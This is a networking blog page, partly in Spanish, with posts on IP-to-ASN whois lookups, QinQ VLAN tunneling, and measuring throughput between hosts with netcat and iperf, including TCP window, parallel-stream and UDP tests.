$ whois -h whois.cymru.com " -v 216.90.108.31 2005-12-25 13:23:01 GMT"

AS      | IP               | BGP Prefix          | CC | Registry | Allocated  | Info                    | AS Name
23028   | 216.90.108.31    | 216.90.108.0/24     | US | arin     | 1998-09-25 | 2005-12-25 13:23:01 GMT | TEAMCYMRU - SAUNET

You may also query for some basic AS information directly:

$ whois -h whois.cymru.com " -v AS23028"

AS      | CC | Registry | Allocated  | AS Name
23028   | US | arin     | 2002-01-04 | TEAMCYMRU - SAUNET

We recommend the use GNU’s version of netcat, not nc. (nc has been known to cause buffering problems with our server and will not always return the full output for larger IP lists). GNU netcat can be downloaded from http://netcat.sourceforge.net. This is the same as gnetcat in FreeBSD ports.

Links:

https://asn.cymru.com/

https://www.ultratools.com/tools/asnInfoResult?domainName=8.8.8.8

 

Category: NETWORKING, TOOLS | Los comentarios están deshabilitados en IP TO ASN MAPPING
Septiembre 24

QinQ

Pasar un trunk a través de una vlan

Q in Q, o dot1q tunneling es una tecnología principalmente destinada a operadores, y como en casi todas las tecnologías de operador, permite sacar mucho mas rendimiento a la tecnología.

¿En que consiste Q in Q?

Q in Q consiste en hacer un tunnel, el cual permite que usando como transporte una única VLAN(Vlan que estará en la red del operador) transportar todas las VLAN de un trunk 802.1q de un cliente. Es simplemente un sistema de VPN de nivel 2 para cliente, que usa como transporte una red de nivel 2 en el lado de operador.

¿Como funciona?

Intentando no hacer un artículo infumable diremos que lo que hace es añadir doble etiquetado de VLAN, osea a parte del etiquetado de 802.1q que usa el cliente, nosotros volvemos a poner nuestro etiquetado de 802.1q, de este modo cuando los paquetes atraviesan la red del operador lo único a lo que se va a hacer caso es al etiquetado 802.1q de operador, y cuando se llega al otro extremo del tunnel se quita ese etiquetado, y se entrega un trunk normal y corriente.

El formato de trama 802.1QinQ es:

MAC Dest MAC Source dot1Q dot1Q IP

QinQ

 

¿Implicaciones de Spanning Tree?

El cliente interactuará entre sus lans como si fuesen switches directamente conectados, a efectos prácticos es como una LAN. Por tanto el cliente con su STP, y el operador con el suyo propio, por supuesto cualquier cambio de STP en el proveedor afecta al cliente en forma de corte.

Category: NETWORKING, QinQ | Los comentarios están deshabilitados en QinQ
Enero 23

How to test network connection performance between two Linux servers

Information

In some cases, it is necessary to check network connection performance between two Linux-based hosts, for example, to validate traffic shaping settings.

The simplest way to do this is to use netcat.

On server machine:

<code>~# nc -l 1122 &gt; /dev/null
</code>

On client machine:

<code>~# dd if=/dev/zero bs=9100004096 count=1 | nc &lt;SERVER_MACHINE_IP&gt; 1122
</code>

As a result, a similar message will be displayed:

<code>2147479552 bytes (2.1 GB) copied, 46.8923 s, 45.8 MB/s
</code>

NOTE: It is necessary to set count=1 because after the first portion, netcat will quit.

Listen and pipe to /dev/null on one machine

<code>nc –l –p 7000 | /dev/null
</code>

Connect and pipe 100MiB of random data on the other

<code>dd if=/dev/urandom bs=1M count=100 | nc 192.168.1.120 7000 –q 10
</code>

For realtime stats use pipeviewer

<code>dd if=/dev/urandom bs=1M count=100 | pv | nc 192.168.1.120 7000 -q 10</code>
Category: NETWORKING, PERF | Los comentarios están deshabilitados en How to test network connection performance between two Linux servers
Enero 23

Testing network performance

Testing network performance in terms of speed and bandwidth is a norm in both production and non-production environment.

A detailed report of speed and bandwidth analysis is very much necessary for the deployment of network dependent application servers. Also sometimes you need to double check the speed of your network throughput while troubleshooting. All these requires a reliable network performance testing tool. This post will be concentrating on one such tool called as “iperf”.

IPERF is an open source tool that can be used to test network performance. Iperf is much more reliable in its test results compared to many other online network speed test providers.

An added advantage of using IPERF for testing network performance is the fact that, it is very reliable if you have two servers, both in geographically different locations, and you want to measure network performance between them.

 

How to install iperf?

Installing iperf is very much easy, if you have epel yum repository enabled(in redhat system’s).

1
2
3
4
5
6
7
[root@slashroot1 ~]# yum install iperf
================================================================================
 Package          Arch            Version                 Repository       Size
================================================================================
Installing:
 iperf            i386            2.0.5-1.el5             epel             52 k

Installing iperf from source is also very much easy. Just download the iperf source package fromIperf Source Package

And do a normal source installation steps as follows.

1
#tar -xvf iperf-2.0.5.tar.gz

The above command will extract the tar package You downloaded from the above link.

Now get inside the extracted directory and run the below command to configure, with the default options.

1
2
[root@slashroot2 ~]# cd iperf-2.0.5
[root@slashroot2 iperf-2.0.5]# ./configure

 

Now lets compile it with “make” command, and then install it using “make install” command.

1
2
[root@slashroot2 iperf-2.0.5]# make
[root@slashroot2 iperf-2.0.5]# make install

How to install iperf in windows machine?

Installing iperf in windows is also quite easy. Lets see how.

You can download iperf for windows from Iperf For windows. Now unzip this zip file to a folder named “iperf” and run the iperf.exe inside that directory.

For example i have extracted, the iperf zip in C:\iperf directory, so will open the Windows CMD, and navigate to that directory, to run the iperf.exe command.

1
2
C:\>cd C:\iperf
C:\iperf>iperf.exe

How to test the network speed between one windows machine and a linux machine?

As i told before, iperf can be used to perform speed test between remote machine’s. It works in a client server model.

noteThe operating system does not matter, while you are using iperf. The commands for using iperf on windows is exactly the same as in linux. And also other operating system. Normally in the test environment, iperf client sends data to the server for the test.

Before going ahead with the test, lets understand some networking concepts related to speed test.

Network Throughput

Transfer rate of data from one place to another with respect to time is called as throughput. Throughput is considered a quality measuring metric for hard disks,network etc. Its measured in Kbps(Kilo bits per second),Mbps(Mega bits per second),Gbps(Giga bits per second.)

TCP Window

TCP (Transmission Control Protocol), is a reliable transport layer protocol used for network communications. How TCP works, is beyond the scope of this article. TCP works on a reliable manner, by sending messages and waiting for acknowledgement from the receiver.

Whenever two machine’s are communicating with each other, then each of them will inform the other, about the amount of bytes it is ready to receive at one time.

In other words, the maximum amount of data that a sender can send the other end, without an acknowledgement is called as Window Size. This TCP window size affects network throughput very badly sometimes. Lets take an example.

Suppose you want to send a 500MB of data from one machine to the other, with the tcp window size of 64KB.

Which means for sending the whole 500MB data, the sending machine has to wait 800 times for an acknowledgement from the receiver.

500MB / 64KB = 800

So you can clearly see that, if you increase the Window size a little bit to tune TCP, it can bring significant difference to the throughput achieved.

Suppose you have a windows machine and want to measure the speed between it and another Linux machine, then you need to make one as client, and another as the server. Lets see how.

We will make our windows machine the server and the Linux machine as the client.

1
2
3
4
5
C:\iperf>iperf.exe -s
------------------------------------------------------------
Server listening on TCP port 5001
TCP window size: 64.0 KByte (default)
------------------------------------------------------------

-S argument is used for specifying server

The above command, starts iperf server on the windows machine, and it bydefault runs on the port 5001 by default.(It also reports that the default TCP window size is 64.0KB).

Lets test the throughput from the Linux client machine, as shown below.

1
2
3
4
5
6
7
8
[root@slashroot2 ~]# iperf -c 192.168.0.101
------------------------------------------------------------
Client connecting to 192.168.0.101, TCP port 5001
TCP window size: 16.0 KByte (default)
------------------------------------------------------------
[  3] local 192.168.0.102 port 47326 connected with 192.168.0.101 port 5001
[ ID] Interval       Transfer     Bandwidth
[  3]  0.0-10.0 sec   308 MBytes   258 Mbits/sec

From the above output, you can see that i got a speed of 258Mbits/sec. The ouput shows something more.

Interval:  Interval specifies the time duration for which the data is transferred.

Transfer: All data transferred using iperf is through memory, and is flushed out after completing the test. So there is no need to clear the transferred file after the test. This column shows the transferred data size.

Bandwidth: This shows the rate of speed with which the data is transferred.

 

You can start your iperf server on your desired port with the following method.

1
2
3
4
5
C:\iperf>iperf.exe -s -p 2000
------------------------------------------------------------
Server listening on TCP port 2000
TCP window size: 64.0 KByte (default)
------------------------------------------------------------

Also you can tell the client to connect to your desired server port and also tweak some more connection and reporting parameter’s as shown below.

1
2
3
4
5
6
7
8
9
root@slashroot2 ~]# iperf -c 192.168.0.101 -t 20 -p 2000 -w 40k
------------------------------------------------------------
Client connecting to 192.168.0.101, TCP port 2000
TCP window size: 80.0 KByte (WARNING: requested 40.0 KByte)
------------------------------------------------------------
[  3] local 192.168.0.1[02 port 60961 connected with 192.168.0.101 port 2000
[ ID] Interval       Transfer     Bandwidth
[  3]  0.0-20.0 sec  1.74 GBytes   747 Mbits/sec

-t  option used in the above command tells to transfer data for 20 seconds.

-p  will tell the client to connect the port 2000 on the server

-w will specify your desired window size value. As i told before, window size tuning will improve TCP transfer rate to a certain extent.

And you can clearly see from the above output that the bandwidth for the whole transfer has increased, as we have increased the window size(I am using two virtual machine’s in one physical box for this iperf demonstration, which is the reason am getting exceptional transfer rate’s).

You can also tell the iperf client to show the transfer rate at an interval of 1 second, for the whole 10 second transfer, as shown below with -i option.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
[root@slashroot2 ~]# iperf -c 192.168.0.100 -P 1 -i 1
------------------------------------------------------------
Client connecting to 192.168.0.100, TCP port 5001
TCP window size: 16.0 KByte (default)
------------------------------------------------------------
[  3] local 192.168.0.102 port 49597 connected with 192.168.0.100 port 5001
[ ID] Interval       Transfer     Bandwidth
[  3]  0.0- 1.0 sec  28.6 MBytes   240 Mbits/sec
[  3]  1.0- 2.0 sec  25.9 MBytes   217 Mbits/sec
[  3]  2.0- 3.0 sec  26.5 MBytes   222 Mbits/sec
[  3]  3.0- 4.0 sec  26.6 MBytes   223 Mbits/sec
[  3]  4.0- 5.0 sec  26.0 MBytes   218 Mbits/sec
[  3]  5.0- 6.0 sec  26.2 MBytes   220 Mbits/sec
[  3]  6.0- 7.0 sec  26.8 MBytes   224 Mbits/sec
[  3]  7.0- 8.0 sec  26.0 MBytes   218 Mbits/sec
[  3]  8.0- 9.0 sec  25.8 MBytes   216 Mbits/sec
[  3]  9.0-10.0 sec  26.4 MBytes   221 Mbits/sec
[  3]  0.0-10.0 sec   265 MBytes   222 Mbits/sec

Until now we have only seen the throughput of one TCP connection. Because when you run iperf, by default if only creates one TCP connection with the remote server.

 

noteYou Might have noticed that some internet Download manager’s are so fast while they download any content from the internet, compared to the normal operating system downloader. The main reason behind it is the fact that they work on “Parallel TCP connections.” One such download manager, that i remember is “Internet Download Manager”.

Let’s check the throughput report by increasing the number of parallel connections using “iperf”.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
[root@slashroot2 ~]# iperf -c 192.168.0.100 -P 20
------------------------------------------------------------
Client connecting to 192.168.0.100, TCP port 5001
TCP window size: 16.0 KByte (default)
------------------------------------------------------------
[ 15] local 192.168.0.102 port 57258 connected with 192.168.0.100 port 5001
[  3] local 192.168.0.102 port 57246 connected with 192.168.0.100 port 5001
[  4] local 192.168.0.102 port 57247 connected with 192.168.0.100 port 5001
[  5] local 192.168.0.102 port 57248 connected with 192.168.0.100 port 5001
[  7] local 192.168.0.102 port 57250 connected with 192.168.0.100 port 5001
[  6] local 192.168.0.102 port 57249 connected with 192.168.0.100 port 5001
[ 10] local 192.168.0.102 port 57253 connected with 192.168.0.100 port 5001
[  8] local 192.168.0.102 port 57251 connected with 192.168.0.100 port 5001
[  9] local 192.168.0.102 port 57252 connected with 192.168.0.100 port 5001
[ 16] local 192.168.0.102 port 57259 connected with 192.168.0.100 port 5001
[ 19] local 192.168.0.102 port 57261 connected with 192.168.0.100 port 5001
[ 18] local 192.168.0.102 port 57260 connected with 192.168.0.100 port 5001
[ 20] local 192.168.0.102 port 57262 connected with 192.168.0.100 port 5001
[ 17] local 192.168.0.102 port 57263 connected with 192.168.0.100 port 5001
[ 21] local 192.168.0.102 port 57264 connected with 192.168.0.100 port 5001
[ 11] local 192.168.0.102 port 57254 connected with 192.168.0.100 port 5001
[ 12] local 192.168.0.102 port 57255 connected with 192.168.0.100 port 5001
[ 13] local 192.168.0.102 port 57256 connected with 192.168.0.100 port 5001
[ 14] local 192.168.0.102 port 57257 connected with 192.168.0.100 port 5001
[ 22] local 192.168.0.102 port 57265 connected with 192.168.0.100 port 5001
[ ID] Interval       Transfer     Bandwidth
[  8]  0.0-10.6 sec  16.6 MBytes  13.1 Mbits/sec
[ 16]  0.0-10.6 sec  16.6 MBytes  13.1 Mbits/sec
[ 18]  0.0-10.6 sec  16.5 MBytes  13.1 Mbits/sec
[ 17]  0.0-10.7 sec  16.6 MBytes  13.0 Mbits/sec
[ 21]  0.0-10.7 sec  15.6 MBytes  12.3 Mbits/sec
[ 12]  0.0-10.7 sec  17.5 MBytes  13.7 Mbits/sec
[ 22]  0.0-10.7 sec  16.6 MBytes  13.0 Mbits/sec
[ 15]  0.0-10.8 sec  17.8 MBytes  13.8 Mbits/sec
[  3]  0.0-10.7 sec  18.5 MBytes  14.5 Mbits/sec
[  4]  0.0-10.8 sec  18.1 MBytes  14.1 Mbits/sec
[  5]  0.0-10.7 sec  17.6 MBytes  13.9 Mbits/sec
[  7]  0.0-10.8 sec  18.4 MBytes  14.3 Mbits/sec
[  6]  0.0-10.8 sec  17.0 MBytes  13.2 Mbits/sec
[ 10]  0.0-10.8 sec  16.8 MBytes  13.1 Mbits/sec
[  9]  0.0-10.8 sec  16.8 MBytes  13.0 Mbits/sec
[ 19]  0.0-10.6 sec  16.5 MBytes  13.0 Mbits/sec
[ 20]  0.0-10.7 sec  16.5 MBytes  12.9 Mbits/sec
[ 11]  0.0-10.7 sec  18.0 MBytes  14.0 Mbits/sec
[ 13]  0.0-10.7 sec  17.8 MBytes  13.9 Mbits/sec
[ 14]  0.0-10.8 sec  18.2 MBytes  14.1 Mbits/sec
[SUM]  0.0-10.8 sec   344 MBytes   266 Mbits/sec

In the above shown example i have told iperf client to create 20 parallel TCP connections to the remote host while the data transfer. And if observe the output, you can see clearly that 20 different ports on the client is connected to the default 5001 port on the server.

And all of the connections had different transfer rate, and at the end we got a combined throughput of 266Mbits/s.(Which is much better that a single TCP connection.)

 

Conducting a UDP speed test in iperf

Conducting a UDP speed test using iperf will provide you with a couple of more information about your network which will be very much useful in finding network bottlenecks.

As we discussed before, not only TCP window size but network parameter’s like the following also affects the throughput achieved during a connectionn.

  • Out of order delivery
  • Network Jitter
  • Packet loss out of total number of packets

For conduction an iperf udp test, you need to start the server with the -u option so that the UDP port 5001 is opened on the server side.

1
2
3
4
5
6
C:\iperf>iperf.exe -s -u
------------------------------------------------------------
Server listening on UDP port 5001
Receiving 1470 byte datagrams
UDP buffer size: 64.0 KByte (default)
------------------------------------------------------------

Now lets start the data transfer from the client side by sending UDP traffic.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
[root@slashroot2 ~]# iperf -c 192.168.0.100 -u -b 100m
------------------------------------------------------------
Client connecting to 192.168.0.100, UDP port 5001
Sending 1470 byte datagrams
UDP buffer size:  107 KByte (default)
------------------------------------------------------------
[  3] local 192.168.0.102 port 50836 connected with 192.168.0.100 port 5001
[ ID] Interval       Transfer     Bandwidth
[  3]  0.0-10.0 sec  97.4 MBytes  81.7 Mbits/sec
[  3] Sent 69508 datagrams
[  3] Server Report:
[  3]  0.0-10.0 sec  97.4 MBytes  81.8 Mbits/sec   0.167 ms   49/69507 (0.07%)
[  3]  0.0-10.0 sec  1 datagrams received out-of-order
[root@slashroot2 ~]#

 

In the above example, i have used -b option to specify the bandwidth to use(because by default iperf UDP only used 1Mbps, i will recommend using your full available bandwidth to get an idea)

-u options needs to be also used on the client side for specifying UDP traffic.

The ouput tells us the following information.

Bandwidth = 81.7Mbits/sec

Network jitter = 0.167 ms (network jitter is the deviation in time for periodic arrival of data gram’s. If you are doing the test with server’s on the other side of the globe, then you might see higher jitter values in iperf output.)

Out of Order = 1 datagram

Lost/Total =  49/69508

0.07 percent datagram loss is not at all significant, infact you can say that you got a nice network packet loss ratio.

VOIP require’s a very less datagram loss because its voice communication.  A high data gram loss can drop the call altogether. So UDP testing with iperf will be very much helpful if you have VOIP or other such critical applications on your infrastructure.

You can get all the option’s related to iperf with the following command.

<span class="geshifilter"><code class="text geshifilter-text">[root@slashroot2 ~]# iperf --help</code></span>
Category: NETWORKING, PERF | Los comentarios están deshabilitados en Testing network performance